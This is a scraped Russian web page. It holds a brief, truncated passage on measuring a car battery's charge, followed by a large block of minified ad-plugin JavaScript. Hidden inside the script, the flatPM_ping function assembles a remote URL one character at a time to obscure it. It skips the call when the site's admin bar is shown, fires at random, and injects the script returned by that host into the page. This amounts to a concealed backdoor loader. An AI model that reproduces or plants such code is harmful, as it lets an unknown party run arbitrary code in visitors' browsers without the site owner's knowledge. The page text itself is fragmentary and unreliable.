Другое дело, если вы располагаете зарядным устройством с ручным управлением, либо не имеющим функции автоматического отключения. Тогда необходимо контролировать ток и напряжение с помощью встроенного в зарядник прибора, либо периодически замерять величины мультиметром.

Как определить емкость заряда? По напряжению на контактах АКБ.
Таблица ЭДС батареи в вольтах при температуре:

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()};var parseHTML=function(){var o=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,n,r,l=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=l.appendChild(t.createElement("div")),n=(d.exec(e)||["",""])[1].toLowerCase(),n=c[n]||c._default,a.innerHTML=n[1]+e.replace(o,"$2>")+n[2],r=n[0];r--;)a=a.lastChild;for(l.removeChild(l.firstChild);a.firstChild;)l.appendChild(a.firstChild)}else l.appendChild(t.createTextNode(e));return l}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,n=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)n.appendChild(a),ff(n).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var l=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",n=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,r='
'+a+" через "+o+'
'+n+'
',i=e.once;l(t).each(function(){var e=l(this);e.wrap('
');var t=e.closest(".flat__4_video");-1!==r.indexOf("go"+"oglesyndication")?t.append(r):flatPM_setHTML(t[0],r),e.find(".flat__4_video_flex").one("click",function(){l(this).addClass("show")})}),l("body").on("click",".flat__4_video_item_hover",function(){var e=l(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),n=parseInt(o),r=setInterval(function(){a.text(--n),n'):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){l(this).closest(".flat__4_video_flex").remove(),"true"==i&&l(".flat__4_video_flex").remove()})};
Яндекс.Метрика